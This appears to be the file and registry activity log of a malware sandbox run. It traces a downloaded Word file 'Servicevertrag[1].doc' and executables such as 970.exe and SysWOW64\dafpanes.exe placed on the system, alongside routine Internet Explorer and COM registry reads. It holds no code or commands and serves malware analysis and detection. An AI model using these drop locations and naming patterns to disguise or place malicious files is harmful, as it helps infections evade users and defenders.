C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.gpd
C:\Windows\sysnative\spool\drivers\x64\3\stdnames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteNames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteFilter.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNote.ini
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\shdocvw.dll
C:\Windows\SysWOW64\en-US\shdocvw.dll.mui
C:\Users\user\970.exe
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Users\user\
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\en-US\sc.exe.mui
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\SysWOW64\net.exe
C:\Windows\SysWOW64\net1.exe
C:\Windows\Temp\fwtsqmfile00.sqm
\Device\LanmanDatagramReceiver
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E84ED3A4-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Users\user\AppData\Local\Temp\~DF382AE8405A18B581.TMP
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E84ED3A5-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Users\user\AppData\Local\Temp\~DF56FB948D142E1A7A.TMP
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\favicon[1].ico
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\frameiconcache.dat
C:\Users\user\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\index.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc
\??\PIPE\samr
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc:Zone.Identifier
C:\Users\user\AppData\Local\Temp\CVRDFC4.tmp.cvr
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5441CC-5075-4B4A-912D-1845B4B60578}.tmp
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\~$rvicevertrag[1].doc
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C748C9A8-5233-479B-BF2B-A74C3BC07527}.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3B010865-3F5E-4A31-8B77-A29525663C1A}.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\875991CB.czSJPY5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EAC56381-98E9-43E8-8750-30BF9D94E9FF}.tmp
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E34E75954A05FA2156EB895949C74728
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E34E75954A05FA2156EB895949C74728
C:\Users\user\AppData\Local\Temp\CabF299.tmp
C:\Users\user\AppData\Local\Temp\TarF29A.tmp
C:\Users\user\AppData\Local\Temp\CabF3E3.tmp
C:\Users\user\AppData\Local\Temp\TarF3E4.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\CabF9FD.tmp
C:\Users\user\AppData\Local\Temp\TarF9FE.tmp
C:\Users\user\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIICTOTTU4R5EN55EZ6A.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
C:\Users\user\970.exe
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\Temp\fwtsqmfile00.sqm
\Device\LanmanDatagramReceiver
C:\Windows\SysWOW64\dafpanes.exe
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E84ED3A5-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E84ED3A4-2E0C-11E9-8662-000C2940B9FB}.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc
C:\Users\user\AppData\Local\Temp\CVRDFC4.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\875991CB.czSJPY5
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
C:\Users\user\AppData\Local\Temp\CabF299.tmp
C:\Users\user\AppData\Local\Temp\TarF29A.tmp
C:\Users\user\AppData\Local\Temp\CabF3E3.tmp
C:\Users\user\AppData\Local\Temp\TarF3E4.tmp
C:\Users\user\AppData\Local\Temp\CabF9FD.tmp
C:\Users\user\AppData\Local\Temp\TarF9FE.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIICTOTTU4R5EN55EZ6A.temp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2708.23433393
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2708.23433393
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2708.23433393
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
C:\Windows\SysWOW64\compareiface.exe
C:\Users\user\970.exe
C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\Software\Microsoft\DirectUI
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\AdminActive
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E84ED3A4-2E0C-11E9-8662-000C2940B9FB}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\GipActivityBypass
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{7673B35E-907A-449D-A49F-E5CE47F0B0B2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7673B35E-907A-449D-A49F-E5CE47F0B0B2}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7673B35E-907A-449D-A49F-E5CE47F0B0B2}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\Groups
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\EnabledScopes
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Feeds
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Feeds
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Search
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Search\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\IE8RunOnceLastShown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\IE8RunOnceLastShown
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1000
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Position
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FullScreen
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\IEAK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\IEAK
HKEY_CURRENT_USER\Software\Classes\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF50}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF50}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF50}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\ConfiguredScopes
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\User Favorites Path
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\UpgradeTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Migration
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Migration\IE Installed Date
HKEY_CURRENT_USER\Software\Classes\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF55}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF55}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF55}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF52}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF52}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{04C18CCF-1F57-4CBD-88CC-3900F5195CE3}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{04C18CCF-1F57-4CBD-88CC-3900F5195CE3}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{04C18CCF-1F57-4CBD-88CC-3900F5195CE3}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\CommandBar
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\CommandBar
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseIE7AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchControlWidth
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigrated
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigratedInstalled
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigratedDefaultName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigratedDefaultURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\provider
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\Deleted
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ShowSearchSuggestions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ShowSearchSuggestions
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsGlobal
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsGlobal
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSONFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSONFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURLFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\Codepage
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\Codepage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SortIndex
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\LinksBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\TestHandler
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\LinksFolderMigrate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\MarketingLinksMigrate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\Path
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\Handler
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\FeedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\CascadeFolderBands
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\CascadeFolderBands
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\DefaultItemWidth
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
